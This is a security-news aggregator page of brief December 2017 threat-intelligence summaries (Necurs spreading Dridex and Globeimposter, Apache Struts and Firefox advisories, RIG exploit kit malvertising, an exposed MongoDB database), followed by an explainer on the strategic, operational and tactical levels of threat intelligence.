A MongoDB database that appears to belong to the Tel Aviv-based startup company “AI.Type” was configured for public access which exposed approximately 31 million user records, according to the Kromtech Security Center. The company designed a virtual keyboard that works on mobile devices for both Android and iOS. The exposed database contained 557 gigabytes of data that consists of user registration records in addition to information that was entered onto the keyboard.
Tags: Misconfigured database, MongoDB, Data leak
Click here for Anomali Recommendation

Dridex is Back, Baby! – Necurs Botnet Malspam Pushes Dridex (December 4, 2017)
Researchers have discovered that “Necurs” botnet has resumed its distribution of the “Dridex” banking malware. Researchers note that the last occurrence of Necurs Dridex distribution was identified in June 2017, and that this Necurs campaign is separate from the “Globeimposter” ransomware campaign. The emails purport to be discussing a credit card payment and provides a link to receive the confirmation of the payment. If the link if followed, it will retrieve a malicious Word document. Inside the document is an embedded object that generates up to four URLs to retrieve the Dridex installer.
Tags: Malspam, Botnet, Necurs, Banking trojan, Dridex
Click here for Anomali Recommendation

Apache Software Foundation Releases Security Updates (December 4, 2017)
An alert has been released by the United States Computer Emergency Readiness Team (US-CERT) concerning vulnerabilities in Apache products. Specifically, the vulnerabilities are located in Apache Struts versions 2.5 through 2.5.14. The US-CERT states that an actor could exploit one of these vulnerabilities to take control of an affected system. One of the vulnerabilities can be exploited by an actor via a custom JSON request that can be used to conduct a Denial-of-Service (DoS) when using an outdated json-lib with Struts REST plugin. The second vulnerability is located in the Jackson JSON library, however, the impact of the issue is, as of this writing, still being researched further.
Tags: Alert, Vulnerabilities, Apache
Click here for Anomali Recommendation

Mozilla Releases Security Update for Firefox (December 4, 2017)
The United States Computer Emergency Readiness Team (US-CERT) has issued an alert regarding vulnerabilities located in the Mozilla Firefox web browser. The US-CERT states that a remote threat actor could exploit these vulnerabilities to take control of an affected system. The vulnerabilities, registered as “CVE-2017-7843” and “CVE-2017-7844,” involves Private Browsing mode storing data across multiple private browsing mode sessions. The latter vulnerability includes an external SVG image referenced on one page, and the coloring of anchor links stored within the image that can be used to determine which pages a user has in their history.
Tags: Alert, Vulnerabilities, Mozilla, Firefox web browser
Click here for Anomali Recommendation

Necurs Botnet Malspam Pushed Globeimposter Ransomware (December 4, 2017)
Researchers have observed that the “Necurs” botnet, known for distributing “Locky” ransomware, is currently distributing the “Globeimposter” ransomware. The ransomware is being distributed via malspam that contain malicious attachments. The emails purport that a message is ready to be sent with the following file or link attachments, or that an attached file is a confirmation of a credit card payment per the recipient’s request. Opening the attachment will begin the infection process for Globeimposter. The threat actors behind this campaign are demanding 0.088 Bitcoin (approximately $1,037 USD) for the decryption key.
Tags: Malspam, Botnet, Necurs, Ransomware, Globeimposter
Click here for Anomali Recommendation

Seamless Campaign Serves RIG EK via Punycode (December 4, 2017)
Malwarebytes Labs researchers have published information regarding the history and current activity regarding the “Seamless” malvertising campaign. The Seamless campaigns are known for almost exclusively distributing the “Ramnit” banking trojan via the RIG exploit kit. Threat actors are currently running two Seamless campaigns simultaneously; one that use static strings and IP literal URLs (URLs that skip DNS), and another that uses special characters. In the latter campaign, actors are using a Cryllic-based domain name that is then transcribed via “Punycode” (encoding used to convert Unicode characters to ASCII). According to researchers, the malvertisements are typically distributed via adult portals that redirect to malicious domains to begin the infection process for Ramnit.
Tags: Malvertising, Seamless campaign, RIG EK, Trojan, Ramnit
Click here for Anomali Recommendation

Observed Threats

This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section. Click here to request a trial.

RIG exploit kit Tool Tip
The RIG exploit kit is a framework used to exploit client side vulnerabilities in web browsers. The RIG exploit kit takes advantage of vulnerabilities in Internet Explorer, Adobe flash, Java and Microsoft Silverlight. The RIG exploit kit was first observed in early 2014. The RIG exploit kit’s objective is to upload malicious code to the target system. The RIG exploit kit is known to distribute ransomware, spambots and backdoors. Victims are redirected to the RIG exploit kit with a landing page coming from malvertising or compromised sites.
Tags: RIG, exploitkit

Source: Honeypot Tech

What is Threat Intelligence?

Written by Steve Miller and Payton Bush

Threat intelligence is a subset of intelligence focused on information security. Gartner (sorry, people) defines threat intelligence as “evidence-based knowledge…about an existing or emerging menace or hazard…to inform decisions regarding the subject’s response to that menace or hazard.” In short, threat intelligence is curated information intended to inform you and help you make better decisions about how to stop bad things from happening to you.

There are a few schools of thought and several sets of vernacular used to describe cyber threat intelligence. But there are generally three “levels” of cyber threat intelligence: strategic, operational and tactical. Some of the similarities and differences between these kinds of intelligence are summarized below:

Collecting each flavor of intelligence is important because they serve different functions.

 Type  Tagline  Half life of utility (for good guys and bad guys)  Focus  Built on the analysis of  Output data types



 Long (multiyear)  Non-technical   Big campaigns, groups, multi victim intrusions (and operational intel)  Long form writing about: victimology, YoY methodology, mapping intrusions and campaigns to conflicts, events and geopolitical pressures



 Medium (one year plus)  Mixed (both really)   Whole malware families, threat groups, human behavior analysis (and tactical intel)  Short form writing, bulleted lists, about: persistence and comms techniques, victims, group profiles, family profiles, TTP descriptions, triggers, patterns, and methodology rules
 Tactical  What?   Short (months)   Technical   Security events, individual malware samples, phishing emails, attacker infrastructure  Atomic and machine-readable indicators such as IPs, domains, IOCs, “signatures”

Analysts deal with a lot of alerts. Alerts enriched with tactical intelligence provide more context and help analysts determine which threats are worth worrying about and which can safely be ignored. These atomic indicators are often changed quickly though, making it important to also incorporate operational and strategic intelligence into decisions.

Operational intelligence helps fuel meaningful detection, incident response and hunting programs. For example, it can help identify patterns in attacks with with we can create logical rules in tech systems that will detect malicious activity specific indicators.

Strategic intelligence can help with assessing and mitigating current and future risks to organizations. For example, a corporation releasing a new product or completing a merger will want to understand not only the potential impact but also the associated risks. This intelligence is particularly useful for people in leadership roles such as CISOs and executive leadership who must justify budgets and make better informed investment decisions.

The sum of these different kinds of threat intelligence is the ability to make informed decisions on how to proactively and reactively respond to threats. This includes what solutions to use, how they should be leveraged, and even just who to keep tabs on.

Check back in January for a deeper look into what these three kinds of intelligence look like and how they’re used.

Source: Honeypot Tech

Improve Signal-to-Noise Ratio with 'Content Curation:' 5 Steps

By intelligently managing signatures, correlation rules, filters and searches, you can see where your security architecture falls down, and how your tools can better defend the network.
Source: Cyber Monitoring